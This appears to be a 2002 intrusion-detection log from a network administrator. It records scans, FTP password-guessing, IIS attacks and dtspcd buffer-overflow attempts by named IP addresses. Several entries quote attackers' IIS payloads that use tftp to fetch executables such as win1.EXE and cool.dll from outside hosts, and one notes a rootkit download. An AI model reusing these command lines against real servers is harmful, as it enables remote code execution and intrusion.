2002/05/26-14:47:00.16 62.83.79.201 (201-SEVI-30.libre.retevision.es) ping scan of net 2002/05/26-14:51:08.97 62.83.79.201 (201-SEVI-30.libre.retevision.es) portscan about 100 ports per ip, multiple ips 2002/05/26-15:38:52.47 213.245.250.105 (cha213245250105.chello.fr) scannet for port 21 2002/05/26-16:11:44.65 67.227.10.251 (1Cust251.tnt1.san-fernando.ca.da.uu.net) ping sscan of net 2002/05/26-19:47:35.73 61.182.50.241 (CHINANET Hebei province network,CN) scannet fo rport 111, buff overflow attacks 2002/05/26-22:24:16.30 67.39.21.37 (adsl-67-39-21-37.dsl.dytnoh.ameritech.net) scannet for oprt 1214 2002/05/27-07:55:08.12 212.209.165.130 (Telyu AB,SE) massive iis scan/attacks 2002/05/27-10:56:33.06 217.36.24.46 (host217-36-24-46.in-addr.btopenworld.com) scannnet for port 80 2002/05/27-13:08:14.38 67.208.237.9 (1Cust9.tnt1.athens.oh.da.uu.net) 1. try to ftp to prime as james, asdf, xdong guessing passwords. 2002/05/27-13:08:14.38 67.208.237.9 (1Cust9.tnt1.athens.oh.da.uu.net) 2. finally, login in as xdong, ls /home, ftp results 2002/05/27-16:31:05.57 195.186.224.150 (bw1-224pub150.bluewin.ch) scannet for port 21 2002/05/28-04:05:12.24 68.98.62.83 (ip68-98-62-83.ph.ph.cox.net) attack IIS server w/ tftp.exe+"-i"+68.98.62.83+get+win1.EXE+c:\win1.EXE\ 2002/05/28-07:13:35.48 200.5.115.130 (Kidsports - Futurekids,CAPITAL,AR) scannet for port 21 2002/05/28-07:48:45.13 128.255.53.133 (scilitga.lib.uiowa.edu) scannet for port 80 2002/05/28-10:38:05.59 211.21.41.101 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 1433 2002/05/28-10:45:56.82 68.98.62.83 (ip68-98-62-83.ph.ph.cox.net) attack IIS server w/ tftp.exe+"-i"+68.98.62.83+get+win1.EXE+c:\win1.EXE 2002/05/28-15:40:04.59 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515 2002/05/28-22:31:18.22 218.2.151.117 (CHINANET Jiangsu province network,CN) send data to ports UDP 2000,8002 on dat switch 2002/05/29-00:32:22.54 61.144.32.27 (NANTIAN BUILDING,CN) scannet for port 111 2002/05/29-05:32:21.06 213.77.169.7 (pa7.szczytno.sdi.tpnet.pl) scannet for port 111 2002/05/29-08:00:45.26 217.81.233.159 (Fundacion Euro-Arabe de Altos Estudios,GRANADA,ES) scannet for port 80 2002/05/29-08:10:51.73 217.81.233.159 (pD951E99F.dip.t-dialin.net) pound on IIS servers 2002/05/29-08:15:42.22 64.230.75.219 (HSE-Ottawa-ppp237150.sympatico.ca) scannet for ports 80,8080 2002/05/29-16:54:06.36 211.199.243.78 (chungbuk daewoo car repair,chungbuk,KR) scannet for port 22 2002/05/29-20:23:59.77 199.1.196.41 (RA Jones & Co. Inc.,OH,US) pound on IIS servers 2002/05/29-20:40:55.92 213.194.110.19 (b-NET,ISTANBUL,TURKEY) 1. Iletisim Hizmetleri A.S.- attack IIS server w/ command: 2002/05/29-20:40:55.92 213.194.110.19 (b-NET,ISTANBUL,TURKEY) 2. tftp.exe%20-i%20trc.27south.com%20GET%20svconf32.exe%20d:\jbuilder5\lib\ext\svconf32.exe 2002/05/30-00:39:11.39 199.1.196.41 (RA Jones & Co. Inc.,OH,US) pound on IIS servers 2002/05/30-01:40:03.08 24.31.164.13 (dhcp31164013.columbus.rr.com) probe several servers w/ telnet 2002/05/30-02:55:40.48 213.30.188.2 (COMPLETEL SAS France,FR) pound on IIS servers 2002/05/30-06:45:44.13 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers 2002/05/30-08:35:15.04 61.177.251.125 (CHINANET Jiangsu province network) tftp%20-i%20132.235.32.101%20GET%20cool.dll%20c:\httpodbc.dll 2002/05/30-08:42:04.88 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers 2002/05/30-16:16:33.01 62.11.1.166 (ppp-62-11-1-166.dialup.tiscali.it) use anon ftp to get dummy passwd file from ace 2002/05/30-16:51:21.80 62.11.10.149 (ppp-62-11-10-149.dialup.tiscali.it) ftp to ace using decoded user/pass from bad passwd file 2002/05/30-16:51:21.80 62.11.10.149 (ppp-62-11-10-149.dialup.tiscali.it) multple attempts to logon to boss as root using ftp 2002/05/30-17:54:15.00 200.171.116.188 (200-171-116-188.dsl.telesp.net.br) scannet for port 25 2002/05/30-17:54:20.37 202.65.209.39 (ip-39-209-65-202.rev.dyxnet.com) scannet for port 25 2002/05/30-18:09:18.87 195.232.54.23 (fra-tgn-oyv-vty23.as.wcom.net) scannet for port 21,111, CDE dtspcd exploit attempt 2002/05/30-18:38:36.54 195.232.54.23 (fra-tgn-oyv-vty23.as.wcom.net) 1. break into unix box. ftp to 216.167.48.17 to get root kit.;; 2002/05/30-19:01:32.72 195.232.54.23 ((fra-tgn-oyv-vty23.as.wcom.net) buff overflow attack port 6112 2002/05/30-19:30:59.51 217.117.57.238 (217-117-57-238.teledisnet.be) scannet for port 21, anon ftp attacks 2002/05/30-23:54:56.16 204.17.42.38 (cisc-eth0.zedcor.com) scannet for port 6112 2002/05/30-23:54:56.16 204.94.50.33 (Ultratech Stepper,CA,US) scannet for port 6112, 1524; buff overflow attacks (CDE dtspcd) 2002/05/31-01:21:25.36 217.235.94.105 (pD9EB5E69.dip.t-dialin.net) portscan boss 2002/05/31-01:34:39.53 217.235.87.225 (pD9EB57E1.dip.t-dialin.net) portscan ace 1539 ports 2002/05/31-04:07:24.88 217.117.57.238 (217-117-57-238.teledisnet.be) scannet for port 21, anon ftp attacks 2002/05/31-05:09:15.29 61.177.251.125 (CHINANET Jiangsu province network) pound on IIS servers